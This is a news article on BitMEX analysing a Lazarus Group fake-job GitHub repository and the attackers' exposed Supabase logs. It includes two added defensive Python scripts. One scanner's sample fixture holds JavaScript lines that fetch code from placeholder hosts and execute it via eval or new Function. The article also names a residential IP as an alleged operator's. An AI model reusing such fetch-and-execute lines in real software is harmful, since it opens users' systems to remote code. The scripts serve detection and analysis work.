BitMEX Thwarts Lazarus Group’s Hack Attempt: Exposes IPs and Operational Flaws

BitMEX, the cryptocurrency exchange, has successfully thwarted a hacking attempt by the Lazarus Group. This group is a collective tied to North Korea’s cyber warfare unit. In a detailed blog post released on Friday, BitMEX revealed how its security team uncovered sloppy mistakes made by the attackers. They exposed infected device logs, real IP addresses, and operational flaws. The incident highlights the sophistication and vulnerabilities of one of the world’s most notorious hacking groups.

How the Attack Was Foiled

The attempted hack began when a BitMEX employee was contacted on LinkedIn with an offer to work on a fake NFT marketplace project. Recognizing the proposal as a known phishing tactic used by the Lazarus Group, the employee immediately reported it. This action triggered a full investigation.

BitMEX’s security team accessed a GitHub repository shared by the attacker, which contained a Next.js/React project. Hidden within the code was a malicious payload designed to execute on the employee’s system. However, instead of running the code, the team analyzed it directly.

This analysis revealed several red flags. These included a commented-out line of code that would have fetched and executed a malicious cookie from a domain previously linked to Lazarus by Palo Alto Networks’ Unit 42. Another active line of code sent a request to a different domain, fetching obfuscated JavaScript. Using tools like webcrack, BitMEX deobfuscated the script, uncovering three distinct components mashed together.
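The static review described above (reading the repository rather than running it) can be partly automated. The following is an added example, not BitMEX's tooling or the attacker's code: a small triage script that walks the files of a JavaScript project, flags dynamic code execution, remote script fetches and obfuscation markers, and records whether each hit sits in a commented-out line, since a disabled loader is itself an indicator. The sample project contents and the `.invalid` domains are constructed for the example; the rule list is a starting point, not a complete signature set.

```python
import re
from dataclasses import dataclass

# Constructed sample resembling the pattern described in the article: one
# commented-out loader line and one active remote fetch that executes what it
# receives. The domains are reserved placeholders, not real infrastructure.
SAMPLE_FILES = {
    "pages/api/auth.js": """
const next = require('next');
// fetch('https://c2-placeholder.invalid/cookie').then(r => r.text()).then(s => eval(s));
fetch('https://loader-placeholder.invalid/app.js').then(r => r.text()).then(s => new Function(s)());
module.exports = { ok: true };
""",
    "components/Header.js": """
export default function Header() { return <h1>Marketplace</h1>; }
""",
}

# Each rule is (name, regex). Hits are reviewed by a human; none is proof on its own.
RULES = [
    ("dynamic-eval", re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    ("remote-fetch", re.compile(r"\bfetch\s*\(\s*['\"]https?://")),
    ("child-process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)")),
    ("hex-escapes", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),  # long runs of \xNN escapes
]
COMMENT_RE = re.compile(r"^\s*//")


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    commented_out: bool
    text: str


def triage(files):
    """Scan every line of every file against RULES and collect findings."""
    findings = []
    for path, src in files.items():
        for n, line in enumerate(src.splitlines(), 1):
            for rule, rx in RULES:
                if rx.search(line):
                    findings.append(
                        Finding(path, n, rule, bool(COMMENT_RE.match(line)), line.strip())
                    )
    return findings


def urls_in(files):
    """Collect every http(s) origin mentioned in the project, for IoC extraction."""
    rx = re.compile(r"https?://[\w.-]+")
    return sorted({m for src in files.values() for m in rx.findall(src)})


def summarize(findings):
    """Count findings per rule so an analyst sees the shape of the project at a glance."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_FILES):
        flag = "commented-out" if f.commented_out else "active"
        print(f"{f.path}:{f.line} [{f.rule}] ({flag}) {f.text}")
    print("origins:", urls_in(SAMPLE_FILES))
```

Run it against a checked-out repository by replacing `SAMPLE_FILES` with a walk over `*.js`/`*.ts` files; the point is that the review happens on text, never by executing the project, and the extracted origins feed straight into blocklists and IoC sharing.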

Uncovering Lazarus Fingerprints

One part of the malware contained identifiers for Chrome extensions. These are often used in credential-stealing operations. A string labeled p.zi matched older Lazarus malware from the BeaverTail campaign, previously documented by Unit 42. While BitMEX did not re-analyze the BeaverTail component, they focused on another critical discovery. The malware connected to an open Supabase database.

Supabase, a backend platform similar to Firebase, was left completely unprotected by the attackers. When BitMEX tested the database, they gained direct access without requiring a login or authentication.

Exposing Infected Device Logs and Real IPs

The Supabase database contained 37 logs of infected machines. Each entry showed details such as usernames, hostnames, operating systems, IP addresses, geolocations, and timestamps. Patterns emerged, with some devices appearing repeatedly—likely developer or test machines. Hostnames followed a consistent 3-XXX structure, and many IPs linked to VPN providers.

However, one user, identified as Victor, made a critical mistake. While he frequently used Touch VPN, one log revealed his real residential IP address: 223.104.144.97, located in Jiaxing, China, under China Mobile. This slip-up likely exposed the real identity of a Lazarus operator, marking a significant operational failure.

Another user, GHOST72, relied on Astrill VPN, but their activity also pointed to potential lapses. Since May 14, BitMEX’s monitoring tool has collected 856 entries from the database. They identified 174 unique combinations of usernames and hostnames.

Insights into Lazarus Operations

By analyzing timestamps, BitMEX observed a drop in Lazarus activity between 8 AM and 1 PM UTC. This time corresponds to evening hours in Pyongyang. This structured schedule further confirms that the group operates as an organized team rather than a loose collective of freelancers.

The attack also revealed a division within the group. The initial phishing attempt on LinkedIn was relatively amateurish, while the post-exploitation script demonstrated advanced skills. According to BitMEX:

“Throughout the last few years, it appears that the group has divided into multiple subgroups that are not necessarily of the same technical sophistication.”

This pattern aligns with previous incidents, such as the Bybit breach, where one team handled phishing while another conducted advanced intrusions once access was gained.

Strengthening Internal Monitoring

Following the incident, BitMEX has implemented an internal monitoring system to detect future infections and catch operational security errors. The system continuously pings the exposed Supabase database, collecting new entries and analyzing them for indicators of compromise (IoCs).
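The analysis steps the article describes for the log data (deduplicating username/hostname pairs, spotting the 3-XXX hostname pattern, catching a real IP among VPN addresses, and bucketing timestamps by UTC hour) fit naturally into such a monitoring loop. The following is an added example, not BitMEX's monitoring system: it works on constructed sample rows shaped like the fields the article lists, and the VPN prefix list is an assumption standing in for whatever IP-reputation source a real deployment would use. Pulling fresh rows from a Supabase instance would be an HTTP call against its REST endpoint; that network step is left out so the example runs offline.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Constructed sample rows with the fields the article says each entry carried.
# Usernames echo the article; IPs are documentation ranges, not real addresses.
SAMPLE_ROWS = [
    {"username": "victor", "hostname": "3-001", "os": "Windows", "ip": "192.0.2.10", "geo": "US", "ts": "2025-05-14T15:02:00Z"},
    {"username": "victor", "hostname": "3-001", "os": "Windows", "ip": "192.0.2.10", "geo": "US", "ts": "2025-05-15T16:30:00Z"},
    {"username": "victor", "hostname": "3-001", "os": "Windows", "ip": "203.0.113.7", "geo": "CN", "ts": "2025-05-16T14:10:00Z"},
    {"username": "ghost72", "hostname": "3-014", "os": "macOS", "ip": "198.51.100.3", "geo": "SG", "ts": "2025-05-14T18:45:00Z"},
    {"username": "ghost72", "hostname": "3-014", "os": "macOS", "ip": "198.51.100.3", "geo": "SG", "ts": "2025-05-15T02:05:00Z"},
    {"username": "dev", "hostname": "build-box", "os": "Linux", "ip": "198.51.100.9", "geo": "NL", "ts": "2025-05-15T22:15:00Z"},
]

HOSTNAME_PATTERN = re.compile(r"^3-\d{3}$")
# Assumed "known VPN egress" blocks for this example only; a real deployment
# would consult an IP-reputation or ASN feed here.
KNOWN_VPN_PREFIXES = ("192.0.2.", "198.51.100.")


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def ingest(seen, rows):
    """Return only rows not seen before; `seen` persists between polls."""
    new = []
    for r in rows:
        key = (r["username"], r["hostname"], r["ip"], r["ts"])
        if key not in seen:
            seen.add(key)
            new.append(r)
    return new


def unique_devices(rows):
    """Distinct (username, hostname) pairs, the article's 'unique combinations'."""
    return {(r["username"], r["hostname"]) for r in rows}


def patterned_hostnames(rows):
    """Hostnames matching the 3-XXX convention the article reports."""
    return {r["hostname"] for r in rows if HOSTNAME_PATTERN.match(r["hostname"])}


def ip_slips(rows):
    """Entries whose IP is outside the known VPN blocks: candidate real addresses."""
    return [
        (r["username"], r["ip"], r["ts"])
        for r in rows
        if not r["ip"].startswith(KNOWN_VPN_PREFIXES)
    ]


def hourly_activity(rows):
    """Count of entries per UTC hour."""
    return Counter(parse_ts(r["ts"]).hour for r in rows)


def quietest_window(rows, width):
    """Start hour (UTC) of the `width`-hour window with the least activity, wrapping midnight."""
    counts = hourly_activity(rows)
    return min(range(24), key=lambda h: sum(counts[(h + i) % 24] for i in range(width)))


if __name__ == "__main__":
    seen = set()
    fresh = ingest(seen, SAMPLE_ROWS)
    print(f"new entries: {len(fresh)}, unique devices: {len(unique_devices(fresh))}")
    print("patterned hostnames:", sorted(patterned_hostnames(fresh)))
    print("possible real IPs:", ip_slips(fresh))
    print("quietest 6h window starts at UTC hour", quietest_window(fresh, 6))
```

Each poll passes the same `seen` set so only genuinely new rows are reported, and the slip detector surfaces exactly the kind of entry the article describes: a user who is otherwise consistently behind a VPN appearing once from an address that is not.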

BitMEX also extracted IoCs from the malware. They renamed variables and cleaned the script to understand its functionality. Early parts of the code sent system data (e.g., usernames, IPs) directly into the unprotected Supabase database. This made tracking easy for anyone who discovered it.